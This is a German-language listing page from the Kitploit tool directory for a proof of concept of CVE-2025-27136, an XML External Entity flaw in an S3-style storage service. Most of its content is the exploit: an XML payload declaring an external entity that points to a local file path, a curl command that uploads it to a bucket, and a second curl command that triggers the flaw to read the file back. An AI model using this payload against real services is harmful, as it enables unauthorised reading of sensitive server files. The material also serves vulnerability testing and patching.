Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-27136 — XML External Entity PoC in an S3. | Kitploit
Tools/GitHubGitHub/issaboudin/cve-2025-27136
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingCloud Security
GitHubissaboudin/cve-2025-27136

CVE-2025-27136

XML External Entity PoC in an S3.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-27136

Ausnutzen einer XML-External-Entity-(XXE)-Sicherheitslücke.

Verwendung von XML-Payload zum Abgreifen sensibler Dateien (PoC)

test.xml

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

Verwende curl, um test.xml von unserem lokalen Rechner in den Bucket hochzuladen.

root@kitploit:~
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml

Exploit auslösen & Datei abgreifen

root@kitploit:~
curl http://127.0.0.1:PORT/TB1?location
Tool herunterladen